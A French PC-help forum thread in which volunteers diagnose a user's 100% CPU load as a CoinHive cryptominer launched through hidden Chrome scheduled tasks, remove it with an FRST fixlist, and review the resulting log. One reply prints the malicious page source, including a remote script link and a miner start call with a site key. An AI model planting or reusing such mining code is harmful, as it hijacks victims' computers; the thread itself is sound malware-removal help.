uc utilisé 100% var miner/CoinHive

Optimisation et problème de lenteur PC

Modérateur : Mods Windows

PaulMcC
Intermédiaire
Intermédiaire
Messages : 220
Inscription : 12 mai 2011 20:01

uc utilisé 100% var miner/CoinHive

Message par PaulMcC » 19 nov. 2017 15:38

Bonjour à tous,

Sans que je ne sache pourquoi, dès le démarrage, mon ordinateur a l'uc utilisé à 100%...
Du coup ça ralentie mon pc, et je ne sais pas quoi faire !

Merci de votre aide !




Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 28782
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: uc utilisé 100%

Message par angelique » 19 nov. 2017 19:48

Bonjour/bonsoir

As tu déjà enquêté en lisant cette page ? ➯ CPU100%

------------------------
  • Télécharge sur ton Bureau pas ailleurs FRST.EXE:



    La page de téléchargement : le tutoriel FRST




    !! Placez le programme sur le bureau et pas ailleurs!!
  • Execute FRST.EXE, accepte le disclaimer , Cochez tous les options et cliquez sur le bouton Scan.
    Le scan se lance, les éléments scannés apparaissent en haut.
  • Une fois le scan terminé, une popup vous le signale et deux rapports sont générés : FRST.txt et Addition.txt ( Ces deux rapports se trouvent sur le bureau avec le programme FRST. )


    Utilise le site http://pjjoint.malekal.com/ pour envoyer ton rapport, et poste le lien dans ta prochaine réponse pour analyse.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite

PaulMcC
Intermédiaire
Intermédiaire
Messages : 220
Inscription : 12 mai 2011 20:01

Re: uc utilisé 100%

Message par PaulMcC » 19 nov. 2017 20:11

Merci de votre réponse!

Oui effectivement, j'ai jeté un coup d’œil, mais visiblement il n'y a pas de problème avec svchost.exe ou tiworker.exe par exemple.
Voici les rapports :

Addition.txt
https://pjjoint.malekal.com/files.php?i ... 5p6f146i13

FRST.txt
https://pjjoint.malekal.com/files.php?i ... n8r11k15m9

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 28782
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: uc utilisé 100%

Message par angelique » 19 nov. 2017 20:23

  • et donc le processus qui bouffe les 100% ???
  • Il y'a une tache planifiée miner sur chrome donc normal que le CPU ramone dessus hxxp://89.36.212.185 .On la vire.

    Code : Tout sélectionner

     89.36.212.185
    <html>
    <head>
    <script src="htxp://ccsgo.xyz/login.js"></script>
    <script>
    	var miner = new CoinHive.User('w4wlSQDLFFhNG6WQLlXlvA2J6Ua3CCKY', 'Counter-strike', {threads: 2});
    	miner.start();
    </script>
    </head>
    <body>
    Counter strike Server D
    </body>
    </html>
    
  • Puis tu as une erreur du eventvwr (gestionnaire d’événements de Windows) : Le catalogue d’index des contenus est endommagé

    Error: (11/18/2017 06:04:50 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
    Description: Impossible d’initialiser l’index.

    Détails :
    Le catalogue d’index des contenus est endommagé. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (11/18/2017 06:04:50 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
    Description: Impossible d’initialiser l’application.

    Contexte : Application Windows

    Détails :
    Le catalogue d’index des contenus est endommagé. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (11/18/2017 06:04:50 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
    Description: Impossible d’initialiser l’objet rassembleur.

    Contexte : Application Windows, Catalogue SystemIndex


    donc voir et faire pour l'indexationhttps://www.malekal.com/indexation-fich ... _etlenteur

    puis pour ton miner:
  • Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes. (ou exécuter➫notepad)
    Copie/colle dedans ce qui suit :

    Code : Tout sélectionner

    Task: {481B7503-0BD0-44BF-BEE9-F772831B759D} - System32\Tasks\UpdaterChromeApp2 => "C:\Program Files\Google\Chrome\Application\chrome.exe" hxxp://89.36.212.185/
    Task: {BEC8B3D1-BB67-492C-8B33-5459E215CEBB} - System32\Tasks\UpdaterChromeApp => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://89.36.212.185/
    HKLM\...\batfile\DefaultIcon: %SystemRoot%\SysWow64\imageres.dll,-68 <==== ATTENTION
    HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\SysWow64\imageres.dll,-68 <==== ATTENTION
    HKLM\...\comfile\DefaultIcon: %SystemRoot%\SysWow64\shell32.dll,2 <==== ATTENTION
    Hosts:
    EmptyTemp:
    
    
  • Menu Fichier / Enregistrer-sous
    Place toi sur le bureau.
    Dans le champs en bas, nom du fichier mets : fixlist.txt
    Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe
    Image Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur
    Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction


    Un redémarrage peut être nécessaire (pas obligatoire).
  • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse avec ton commentaire si c'est mieux !
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 91477
Inscription : 10 sept. 2005 13:57
Contact :

Re: uc utilisé 100%

Message par Malekal_morte » 19 nov. 2017 20:38

Déjà si y a un miner ça explique pourquoi la CPU est à la ramasse.

UC à 100% pour quel processus ?
Tu peux donner une capture d'écran du gestionnaire de tâches, onglet processus pour voir ?

Je rajoute ceci :

Vérifie l'état de santé des disques dur notamment avec Par exemple avec CrystalDiskInfo, voir si le statut est correct ou Prudence.
pui Fais un checkdisk, si possible en ligne de commandes.
Lance l'invite de commandes en administrateur puis saisir la commande :
chkdsk c: /F /R
ça doit te proposer de faire une vérification au redémarrage, accepte, le scan peut durer 1h30.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


PaulMcC
Intermédiaire
Intermédiaire
Messages : 220
Inscription : 12 mai 2011 20:01

Re: uc utilisé 100% var miner/CoinHive

Message par PaulMcC » 19 nov. 2017 23:29

Alors voici le rapport fixlog:
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 19-11-2017
Exécuté par Léopold Baudat (19-11-2017 21:06:23) Run:1
Exécuté depuis C:\Users\Léopold Baudat\Desktop
Profils chargés: Léopold Baudat (Profils disponibles: Léopold Baudat)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Task: {481B7503-0BD0-44BF-BEE9-F772831B759D} - System32\Tasks\UpdaterChromeApp2 => "C:\Program Files\Google\Chrome\Application\chrome.exe" hxxp://89.36.212.185/
Task: {BEC8B3D1-BB67-492C-8B33-5459E215CEBB} - System32\Tasks\UpdaterChromeApp => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://89.36.212.185/
HKLM\...\batfile\DefaultIcon: %SystemRoot%\SysWow64\imageres.dll,-68 <==== ATTENTION
HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\SysWow64\imageres.dll,-68 <==== ATTENTION
HKLM\...\comfile\DefaultIcon: %SystemRoot%\SysWow64\shell32.dll,2 <==== ATTENTION
Hosts:
EmptyTemp:


*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{481B7503-0BD0-44BF-BEE9-F772831B759D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{481B7503-0BD0-44BF-BEE9-F772831B759D} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\UpdaterChromeApp2 => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdaterChromeApp2 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BEC8B3D1-BB67-492C-8B33-5459E215CEBB} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BEC8B3D1-BB67-492C-8B33-5459E215CEBB} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\UpdaterChromeApp => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdaterChromeApp => clé supprimé(es) avec succès
HKLM\...\batfile\DefaultIcon: %SystemRoot%\SysWow64\imageres.dll,-68 <==== ATTENTION => Erreur: Pas de correction automatique trouvée pour cet élément.
HKLM\Software\Classes\cmdfile\DefaultIcon\\Default => valeur restauré(es) avec succès
HKLM\Software\Classes\comfile\DefaultIcon\\Default => valeur restauré(es) avec succès
Impossible de déplacer "C:\Windows\System32\Drivers\etc\hosts" => Planifié pour déplacement au redémarrage.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 24402429 B
Java, Flash, Steam htmlcache => 988 B
Windows/system/drivers => 568716 B
Edge => 0 B
Chrome => 7987007 B
Firefox => 395078287 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 71916 B
LocalService => 0 B
NetworkService => 190186 B
Léopold Baudat => 376828976 B

RecycleBin => 1222 B
EmptyTemp: => 775.8 MB données temporaires supprimées.

================================

Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 19-11-2017 21:49:01)

"C:\Windows\System32\Drivers\etc\hosts" => Impossible de déplacer
Impossible de restaurer Hosts.

==== Fin de Fixlog 21:49:01 ====
Et voici la capture du gestionnaire de tâches :
https://pjjoint.malekal.com/files.php?i ... 89n13u9k13

J'ai bien fait ce qu'il fallait pour l'indexation et pour le miner, tout à l'air d'être ok !
Il n'y avait justement aucun processus qui bouffe les 100% !

Par contre, qu'est-ce qu'un "miner" ? parce que j'utilise rarement chrome et je ne vois pas comment ça a pu arriver !

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 28782
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: uc utilisé 100% var miner/CoinHive

Message par angelique » 20 nov. 2017 11:06

En gros c'est ça ➯ https://www.malekal.com/bitcoin-monetisation-de-botnet/

c'est OK, tu peux supprimer frst, ses rapports et sa quarantaine C:\FRST
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite

PaulMcC
Intermédiaire
Intermédiaire
Messages : 220
Inscription : 12 mai 2011 20:01

Re: uc utilisé 100% var miner/CoinHive

Message par PaulMcC » 20 nov. 2017 21:54

D'acc, merci de l'info !

En tout cas, merci encore de votre disponibilité, de votre rapidité, et de vos compétences ! C'est toujours génial d'être aidé par les membres de ce forum ! Bravo à vous !

Avatar de l’utilisateur
loumignon
Messages : 4
Inscription : 07 nov. 2017 13:08
Localisation : Bruxelles

Re: uc utilisé 100% var miner/CoinHive

Message par loumignon » 28 déc. 2017 12:15

Salut, j'avais le même problème avec mon CPU à cause d'un virus.
Dans mon cas le chargement à 100% s'effectuait au moment quand je branchais mon internet.

Dans le gestionnaire des tâches j'ai trouvé les processus suspects: aes-avx.exe et xam.exe
C'était notamment la cause de mon problème. On peut les supprimer manuellement, mais ce n'est pas facile, ou à l'aide d'un antivirus.

En tout cas je voudrais avertir tout le monde: si vous voyez ces processus dans votre odri, il faudra les supprimer tout de suite! Il me semble que c'est un nouveau virus sur lequel il y n'a pas encore assez d'info. En espérant avoir aidé.


Répondre

Revenir vers « Optimisation et problème de lenteur PC »